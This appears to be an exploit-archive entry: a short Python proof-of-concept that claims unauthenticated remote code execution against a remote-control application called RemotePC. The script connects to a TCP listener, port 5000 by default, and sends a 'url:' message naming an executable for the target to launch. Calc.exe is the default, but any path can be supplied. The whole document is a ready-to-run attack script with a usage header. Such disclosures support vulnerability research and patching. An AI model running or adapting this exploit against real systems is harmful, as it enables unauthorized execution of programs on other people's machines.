# Exploit Title: RemotePC - Unauthenticated RCE # Date: 2025-04-14 # Exploit Author: Ahmet Ümit BAYRAM # Vendor: https://github.com/akoc95/RemotePC # Version: latest # Tested on: Windows 10 - 64bit # CVE: N/A #!/usr/bin/env python3 import socket import argparse def exploit_rce(host, port, target_path): print(f"[+] Connecting to {host}:{port}") try: with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.connect((host, port)) payload = f"url:{target_path}" s.sendall(payload.encode()) print(f"[+] Payload sent: {payload}") print("[+] Exploit triggered. If vulnerable, command is executed.") except Exception as e: print(f"[!] Connection failed: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="RemotePC TCPListener Unauthenticated RCE Exploit") parser.add_argument("--host", required=True, help="Target IP address") parser.add_argument("--port", type=int, default=5000, help="Target port (default: 5000)") parser.add_argument("--path", default="C:\\Windows\\System32\\calc.exe", help="Executable path to run on target") args = parser.parse_args() exploit_rce(args.host, args.port, args.path)